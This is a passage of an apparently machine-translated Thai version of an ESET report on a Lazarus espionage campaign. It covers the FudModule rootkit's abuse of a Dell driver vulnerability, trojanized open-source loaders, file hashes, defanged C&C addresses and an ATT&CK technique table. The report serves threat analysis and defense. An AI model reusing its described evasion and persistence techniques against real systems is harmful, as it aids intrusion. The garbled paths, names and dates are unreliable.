User-Agent เหมือนกับ BLINDINGCAN และตัวดาวน์โหลด HTTP(S)  มอซิลลา/5.0 (วินโดวส์ NT 6.1; WOW64) โครม/28.0.1500.95 ซาฟารี/537.36.

รูทคิท FudModule

เราระบุไลบรารีที่เชื่อมโยงแบบไดนามิกด้วยชื่อภายใน FudModule.dll ที่พยายามปิดใช้งานคุณลักษณะการตรวจสอบต่างๆ ของ Windows มันทำได้โดยการปรับเปลี่ยนตัวแปรเคอร์เนลและลบการเรียกกลับของเคอร์เนลซึ่งเป็นไปได้เนื่องจากโมดูลได้รับความสามารถในการเขียนในเคอร์เนลโดยใช้ประโยชน์จากเทคนิค BYOVD – เฉพาะ CVE-2021-21551 ช่องโหว่ในไดรเวอร์ Dell dbutil_2_3.sys

การวิเคราะห์มัลแวร์นี้มีอยู่ในเอกสาร VB2022 Lazarus & BYOVD: ชั่วร้ายต่อแกนหลักของ Windows.

มัลแวร์อื่นๆ

พบเครื่องดรอปเพอร์และโหลดเดอร์เพิ่มเติมในการโจมตี แต่เราไม่ได้รับพารามิเตอร์ที่จำเป็นในการถอดรหัสเพย์โหลดที่ฝังไว้หรือไฟล์ที่เข้ารหัส

lecui ถูกโทรจัน

โครงการ lecui โดย Alec Musafa ให้บริการผู้โจมตีเป็นฐานรหัสสำหรับโทรจันของตัวโหลดเพิ่มเติมสองตัว ตามชื่อไฟล์ พวกเขาปลอมตัวเป็นไลบรารีของ Microsoft mi.dll (โครงสร้างพื้นฐานด้านการจัดการ) และ cryptsp.dll (Cryptographic Service Provider API) ตามลำดับ และนี่เกิดจากการโหลดด้านข้างที่ตั้งใจไว้โดยแอปพลิเคชันที่ถูกกฎหมาย wsmprovhost.exe และ SMSvcHost.exe, ตามลำดับ; ดูตารางที่ 1

จุดประสงค์หลักของตัวโหลดเหล่านี้คือเพื่ออ่านและถอดรหัสไฟล์ปฏิบัติการที่อยู่ใน กระแสข้อมูลสำรอง (โฆษณา) ที่ C:ProgramDataCaphyonmi.dll:Zone.Identifier และ C:ไฟล์โปรแกรมWindows Media PlayerSkinsDarkMode.wmz:Zone.Identifierตามลำดับ เนื่องจากเราไม่ได้รับไฟล์เหล่านี้ จึงไม่ทราบว่าเพย์โหลดใดซ่อนอยู่ที่นั่น อย่างไรก็ตาม สิ่งเดียวที่แน่นอนคือมันเป็นไฟล์ปฏิบัติการ เนื่องจากกระบวนการโหลดเป็นไปตามการถอดรหัส (ดูรูปที่ 2) การใช้โฆษณาไม่ใช่เรื่องใหม่เพราะ Ahnlab รายงานว่า ลาซารัสโจมตีบริษัทเกาหลีใต้ ในเดือนมิถุนายน พ.ศ. 2021 ที่เกี่ยวข้องกับเทคนิคดังกล่าว

ข้อความนิ้วโทรจัน

ESET บล็อกแอปพลิเคชันโอเพ่นซอร์สโทรจันเพิ่มเติม FingerText 0.5.61 โดย erinata, ตั้งอยู่ที่ %WINDIR%securitycredui.dll. ไม่ทราบพารามิเตอร์บรรทัดคำสั่งที่ถูกต้อง เช่นเดียวกับบางกรณีก่อนหน้านี้ พารามิเตอร์สามตัวจำเป็นสำหรับการถอดรหัส AES-128 ของเพย์โหลดที่ฝังไว้: ชื่อของกระบวนการหลัก WFS.exe; พารามิเตอร์ภายใน mg89h7MsC5Da4ANi; และพารามิเตอร์ภายนอกที่ขาดหายไป

sslSniffer ที่ถูกโทรจัน

การโจมตีเป้าหมายในเบลเยียมถูกบล็อกในช่วงต้นของห่วงโซ่การปรับใช้ ดังนั้นจึงมีการระบุไฟล์เพียงไฟล์เดียว นั่นคือหยด 32 บิตที่ตั้งอยู่ที่ C:PublicCachemsdxm.ocx. มันเป็นองค์ประกอบ sslSniffer จาก wolfSSL โครงการที่ถูกโทรจัน ในช่วงเวลาของการโจมตี มันถูกลงนามอย่างถูกต้องด้วยใบรับรองที่ออกให้ “เอ” สำนักงานแพทย์ PLLC (ดูรูปที่ 8) ซึ่งได้หมดอายุลงตั้งแต่นั้นเป็นต้นมา

มีการส่งออกที่เป็นอันตรายสองรายการซึ่ง DLL ที่ถูกต้องไม่มี: ตั้งค่า OfficeCertInit และ ตั้งค่า OfficeCert. การส่งออกทั้งสองต้องมีพารามิเตอร์สองตัวพอดี จุดประสงค์ของการส่งออกครั้งแรกคือการสร้างความคงอยู่โดยการสร้าง OfficeSync.LNK, ตั้งอยู่ที่ %APPDATA%MicrosoftWindowsเมนูเริ่มโปรแกรมการเริ่มต้นชี้ไปที่ DLL ที่เป็นอันตรายและเรียกใช้การส่งออกครั้งที่สองผ่าน rundll32.exe โดยมีพารามิเตอร์ส่งผ่านไปยังตัวเอง

การส่งออกครั้งที่สอง, ตั้งค่า OfficeCert, ใช้พารามิเตอร์แรกเป็นคีย์เพื่อถอดรหัสเพย์โหลดที่ฝังไว้ แต่เราไม่สามารถแยกมันออกมาได้ เนื่องจากเราไม่รู้จักคีย์

อัลกอริธึมการถอดรหัสก็น่าสนใจเช่นกันเมื่อผู้โจมตีใช้ HC-128 โดยมีคีย์ 128 บิตเป็นพารามิเตอร์แรกและสำหรับเวกเตอร์การเริ่มต้น 128 บิต สตริง ffffffffffffffffff. ค่าคงที่ที่เปิดเผยตัวเลขจะแสดงในรูปที่ 10

สรุป

ในการโจมตีครั้งนี้ เช่นเดียวกับการโจมตีอื่นๆ ที่เกิดจาก Lazarus เราพบว่ามีการกระจายเครื่องมือจำนวนมาก แม้กระทั่งบนปลายทางเป้าหมายเดียวในเครือข่ายที่น่าสนใจ ไม่ต้องสงสัยเลยว่าทีมที่อยู่เบื้องหลังการโจมตีนั้นค่อนข้างใหญ่ มีการจัดระเบียบอย่างเป็นระบบ และเตรียมพร้อมมาอย่างดี เป็นครั้งแรกในป่าที่ผู้โจมตีสามารถใช้ CVE-2021-21551 เพื่อปิดการตรวจสอบโซลูชันความปลอดภัยทั้งหมด มันไม่ได้ทำแค่ในเคอร์เนลสเปซเท่านั้น แต่ยังทำอย่างแข็งแกร่งโดยใช้ชุดของ Windows internals เพียงเล็กน้อยหรือไม่มีเอกสาร ไม่ต้องสงสัยเลยว่าสิ่งนี้จำเป็นต้องมีการค้นคว้า พัฒนา และทักษะการทดสอบอย่างลึกซึ้ง

จากมุมมองของกองหลัง ดูเหมือนง่ายกว่าที่จะจำกัดความเป็นไปได้ของการเข้าถึงครั้งแรกมากกว่าที่จะบล็อกชุดเครื่องมือที่แข็งแกร่งซึ่งจะถูกติดตั้งหลังจากที่ผู้โจมตีถูกกำหนดให้ตั้งหลักในระบบแล้ว เช่นเดียวกับในหลายกรณีที่ผ่านมา พนักงานที่ตกเป็นเหยื่อล่อของผู้โจมตีเป็นจุดเริ่มต้นของความล้มเหลวที่นี่ ในเครือข่ายที่มีความละเอียดอ่อน บริษัทต่างๆ ควรยืนกรานว่าพนักงานจะไม่ทำตามวาระส่วนตัว เช่น การหางาน บนอุปกรณ์ที่เป็นโครงสร้างพื้นฐานของบริษัท

ไอโอซี

รายการที่ครอบคลุมของตัวชี้วัดการประนีประนอมและตัวอย่างสามารถพบได้ใน GitHub กรุ

SHA-1	ชื่อไฟล์	การตรวจพบ	รายละเอียด
296D882CB926070F6E43C99B9E1683497B6F17C4	FudModule.dll	Win64/Rootkit.NukeSped.A	โมดูลโหมดผู้ใช้ที่ทำงานด้วยหน่วยความจำเคอร์เนล
001386CBBC258C3FCC64145C74212A024EAA6657	C:PublicCachemsdxm.ocx	Win32/NukeSped.KQ	ดรอปเปอร์ของตัวดาวน์โหลด HTTP(S)
569234EDFB631B4F99656529EC21067A4C933969	colorui.dll	Win64/NukeSped.JK	หยดของ BLINDINGCAN ไซด์โหลดโดย colorcpl.exe ที่ถูกต้อง
735B7E9DFA7AF03B751075FD6D3DE45FBF0330A2	N / A	Win64/NukeSped.JK	รุ่น 64 บิตของ BLINDINGCAN RAT
4AA48160B0DB2F10C7920349E3DCCE01CCE23FE3	N / A	Win32/NukeSped.KQ	ตัวดาวน์โหลด HTTP(S)
C71C19DBB5F40DBB9A721DC05D4F9860590A5762	อะโดบี.tmp	Win64/NukeSped.JD	หยดของผู้อัปโหลด HTTP(S)
97DAAB7B422210AB256824D9759C0DBA319CA468	crui.dll	Win64/NukeSped.JH	หยดของตัวโหลดระดับกลาง
FD6D0080D27929C803A91F268B719F725396FE79	N / A	Win64/NukeSped.LP	ตัวอัปโหลด HTTP(S)
83CF7D8EF1A241001C599B9BCC8940E089B613FB	N / A	Win64/NukeSped.JH	ตัวโหลดระดับกลางที่โหลดเพย์โหลดเพิ่มเติมจากระบบไฟล์
C948AE14761095E4D76B55D9DE86412258BE7AFD	DBUtil_2_3.sys	Win64/DBUtil.A	ไดรเวอร์ที่มีช่องโหว่ที่ถูกต้องตามกฎหมายจาก Dell ลดลงโดย FudModule.dll
085F3A694A1EECDE76A69335CD1EA7F345D61456	cryptsp.dll	Win64/NukeSped.JF	หยดในรูปแบบของห้องสมุดโทรจัน lecui
55CAB89CB8DABCAA944D0BCA5CBBBEB86A11EA12	mi.dll	Win64/NukeSped.JF	หยดในรูปแบบของห้องสมุดโทรจัน lecui
806668ECC4BFB271E645ACB42F22F750BFF8EE96	crui.dll	Win64/NukeSped.JC	ปลั๊กอิน FingerText ที่ถูกโทรจันสำหรับ Notepad++
BD5DCB90C5B5FA7F5350EA2B9ACE56E62385CA65	msdxm.ocx	Win32/NukeSped.KT	sslSniffer ของ LibreSSL เวอร์ชันโทรจัน

เครือข่าย

IP	ผู้ให้บริการ	เห็นครั้งแรก	รายละเอียด
67.225.140[.]4	Liquid Web, LLC	2021-10-12	ไซต์ที่ใช้ WordPress ที่ถูกบุกรุกซึ่งโฮสต์เซิร์ฟเวอร์ C&C https://turnscor[.]com/wp-includes/feedback.php
50.192.28[.]29	Comcast Cable Communications, LLC	2021-10-12	ไซต์ที่ถูกบุกรุกซึ่งโฮสต์เซิร์ฟเวอร์ C&C https://aquaprographix[.]com/patterns/Map/maps.php
31.11.32[.]79	Aruba SpA	2021-10-15	ไซต์ที่ถูกบุกรุกซึ่งโฮสต์เซิร์ฟเวอร์ C&C http://www.stracarrara[.]org/images/img.asp

เทคนิค MITER ATT&CK

ตารางนี้ถูกสร้างขึ้นโดยใช้ 11 รุ่น ของกรอบงาน MITER ATT&CK

ชั้นเชิง	ID	Name	รายละเอียด
การกระทำ	T1106	API ดั้งเดิม	แบ็คดอร์ Lazarus HTTP(S) ใช้ Windows API เพื่อสร้างกระบวนการใหม่
	T1059.003	ล่ามคำสั่งและสคริปต์: Windows Command Shell	มัลแวร์แบ็คดอร์ HTTP(S) ใช้ cmd.exe เพื่อรันเครื่องมือบรรทัดคำสั่ง
การหลบหลีกการป้องกัน	T1140	ถอดรหัสซอร์สโค้ดที่สร้างความสับสน/ถอดรหัสไฟล์หรือข้อมูล	เครื่องมือ Lazarus จำนวนมากถูกเก็บไว้ในสถานะเข้ารหัสบนระบบไฟล์
	T1070.006	การลบตัวบ่งชี้บนโฮสต์: Timestomp	แบ็คดอร์ Lazarus HTTP(S) สามารถแก้ไขแอตทริบิวต์เวลาไฟล์ของไฟล์ที่เลือกได้
	T1574.002	ขั้นตอนการดำเนินการจี้: DLL Side-Loading	ดรอปเพอร์และโหลดเดอร์ของ Lazarus จำนวนมากใช้โปรแกรมที่ถูกต้องสำหรับการโหลด
	T1014	รูทคิท	โมดูล user-to-kernel ของ Lazarus สามารถปิดคุณสมบัติการตรวจสอบของ OS ได้
	T1027.002	ไฟล์หรือข้อมูลที่ทำให้สับสน: การบรรจุซอฟต์แวร์	Lazarus ใช้ Themida และ VMProtect เพื่อทำให้ไบนารีของพวกเขาสับสน
	T1218.011	การดำเนินการพร็อกซีไบนารีของระบบ: Rundll32	Lazarus ใช้ rundll32.exe เพื่อดำเนินการ DLL ที่เป็นอันตราย
ควบคุมและสั่งการ	T1071.001	Application Layer Protocol: โปรโตคอลเว็บ	แบ็คดอร์ Lazarus HTTP(S) ใช้ HTTP และ HTTPS เพื่อสื่อสารกับเซิร์ฟเวอร์ C&C
	T1573.001	ช่องที่เข้ารหัส: Symmetric Cryptography	แบ็คดอร์ Lazarus HTTP(S) เข้ารหัสการรับส่งข้อมูล C&C โดยใช้อัลกอริทึม AES-128
	T1132.001	การเข้ารหัสข้อมูล: การเข้ารหัสมาตรฐาน	เพย์โหลด Lazarus HTTP(S) เข้ารหัสทราฟฟิก C&C โดยใช้อัลกอริธึม base64
การกรอง	T1560.002	เก็บข้อมูลที่เก็บถาวร: เก็บถาวรผ่านห้องสมุด	ผู้อัปโหลด Lazarus HTTP(S) สามารถซิปไฟล์ที่สนใจและอัปโหลดไปยัง C&C
การพัฒนาทรัพยากร	T1584.004	รับโครงสร้างพื้นฐาน: เซิร์ฟเวอร์	เซิร์ฟเวอร์ที่ถูกบุกรุกถูกใช้โดยแบ็คดอร์ Lazarus HTTP(S) ตัวอัปโหลดและตัวดาวน์โหลดทั้งหมดเป็น C&C
พัฒนาความสามารถ	T1587.001	มัลแวร์	เครื่องมือที่กำหนดเองจากการโจมตีมีแนวโน้มที่จะพัฒนาโดยผู้โจมตี บางตัวแสดงความสามารถในการพัฒนาเคอร์เนลที่จำเพาะเจาะจงสูงซึ่งเห็นก่อนหน้านี้ในเครื่องมือ Lazarus
การกระทำ	T1204.002	การดำเนินการของผู้ใช้: ไฟล์ที่เป็นอันตราย	เป้าหมายถูกล่อให้เปิดเอกสาร Word ที่เป็นอันตราย
การเข้าถึงเบื้องต้น	T1566.003	ฟิชชิ่ง: Spearphishing ผ่านบริการ	เป้าหมายได้รับการติดต่อผ่านการส่งข้อความ LinkedIn
	T1566.001	ฟิชชิ่ง: ไฟล์แนบ Spearphishing	เป้าหมายได้รับไฟล์แนบที่เป็นอันตราย
การติดตา	T1547.006	บูตหรือเข้าสู่ระบบ การดำเนินการเริ่มต้นอัตโนมัติ: โมดูลเคอร์เนลและส่วนขยาย	BYVD DBUtils_2_3.sys ถูกติดตั้งให้เริ่มทำงานผ่านตัวโหลดการบูต (value 0x00 ใน เริ่มต้น คีย์ใต้ HKLMSYSTEM‌ชุดควบคุมปัจจุบันบริการ.
	T1547.001	บูตหรือเข้าสู่ระบบ การดำเนินการเริ่มต้นอัตโนมัติ: โฟลเดอร์เริ่มต้น	ดรอปเปอร์ของตัวดาวน์โหลด HTTP(S) สร้างไฟล์ LNK OneNoteTray.LNK ในโฟลเดอร์เริ่มต้น

อ้างอิง

อันลับ. รายงานการวิเคราะห์การโจมตีรูทคิทของกลุ่มลาซารัสโดยใช้BYOVD. เวอร์ชั่น 1.0. 22 กันยายน 2022 สืบค้นจาก AhnLab Security Emergency Response Center.

อันลับ. (๒๐๒๑,๔มิถุนายน). APT โจมตีบริษัทในประเทศโดยใช้ไฟล์ห้องสมุด. ดึงมาจาก AhnLab Security Emergency Response Center

อันลับ. (2022, 22 กันยายน). รายงานการวิเคราะห์การโจมตีรูทคิทของกลุ่มลาซารัสโดยใช้BYOVD. ดึงมาจาก AhnLab Security Emergency Response Center

Breitenbacher, D. , & Kaspars, O. (2020, มิถุนายน) Operation In(ter)ception: บริษัทการบินและอวกาศและการทหารในเป้าประสงค์ของสายลับไซเบอร์. ดึงมาจาก WeLiveSecurity.com.

ทีมวิจัยเคลียร์สกาย (2020, 13 สิงหาคม). ปฏิบัติการ 'งานในฝัน' แคมเปญจารกรรมเกาหลีเหนือที่แพร่หลาย. ดึงมาจาก ClearSky.com.

Dekel, K. (nd). การวิจัยความปลอดภัย Sentinel Labs CVE-2021-21551- คอมพิวเตอร์ Dell หลายร้อยล้านเครื่องที่มีความเสี่ยงเนื่องจากข้อบกพร่องในการยกระดับสิทธิ์ของไดรเวอร์ BIOS หลายรายการ. ดึงมาจาก SentinelOne.com.

อีสท. (๒๐๒๑, ๓ มิถุนายน ๒๕๖๑). ESET รายงานภัยคุกคาม T 1 2021. ดึงมาจาก WeLiveSecurity.com.

ยอดเยี่ยม. (2016, 16 สิงหาคม). แจกสมการ. ดึงมาจาก SecureList.com.

HvS-ที่ปรึกษา AG. (2020, 15 ธันวาคม). คำทักทายจากลาซารัส: กายวิภาคของแคมเปญจารกรรมทางไซเบอร์. ดึงมาจาก hvs-consulting.de.

Cherepanov, A. , & Kálnai, P. (2020, พฤศจิกายน) การโจมตีห่วงโซ่อุปทานของลาซารัสในเกาหลีใต้. ดึงมาจาก WeLiveSecurity.com.

คัลไน, พี. (2017, 2 17). เจาะลึกมัลแวร์เป้าหมายที่ใช้กับธนาคารในโปแลนด์. (ESET) ดึงมาจาก WeLiveSecurity.com.

Kopeytsev, V. , & Park, S. (2021, กุมภาพันธ์) Lazarus กำหนดเป้าหมายอุตสาหกรรมการป้องกันด้วย ThreatNeedle. (Kaspersky Lab) ดึงมาจาก SecureList.com.

Lee, T.-w., Dong-wook, & Kim, B.-j. (2021). Operation BookCode – กำหนดเป้าหมายไปที่เกาหลีใต้. กระดานข่าวไวรัส localhost. ดึงมาจาก vblocalhost.com.

Maclachlan, J. , Potaczek, M. , Isakovic, N. , Williams, M. , & Gupta, Y. (2022, 14 กันยายน) ได้เวลา PuTTY แล้ว! DPRK โอกาสในการทำงานฟิชชิ่งผ่าน WhatsApp. ดึงมาจาก Mandiant.com.

Tomonaga, S. (2020, 29 กันยายน). BLINDINGCAN – มัลแวร์ที่ใช้โดย Lazarus. (JPCERT/CC) ดึงมาจาก blogs.jpcert.or.jp.

US-CERT CISA (2020, 19 สิงหาคม). MAR-10295134-1.v1 – โทรจันการเข้าถึงระยะไกลของเกาหลีเหนือ: BLINDINGCAN. (CISA) ดึงมาจาก cisa.gov.

ไวเดมันน์, เอ. (2021, 1 25) แคมเปญใหม่ที่กำหนดเป้าหมายนักวิจัยด้านความปลอดภัย. (Google Threat Analysis Group) ดึงมาจาก blog.google.

Wu, H. (2008). สตรีมไซเฟอร์ HC-128 ใน M. Robshaw และ O. Billet การออกแบบรหัสสตรีมใหม่ (ฉบับที่ 4986). เบอร์ลิน, ไฮเดลเบิร์ก: สปริงเกอร์. ดึงมาจาก doi.org.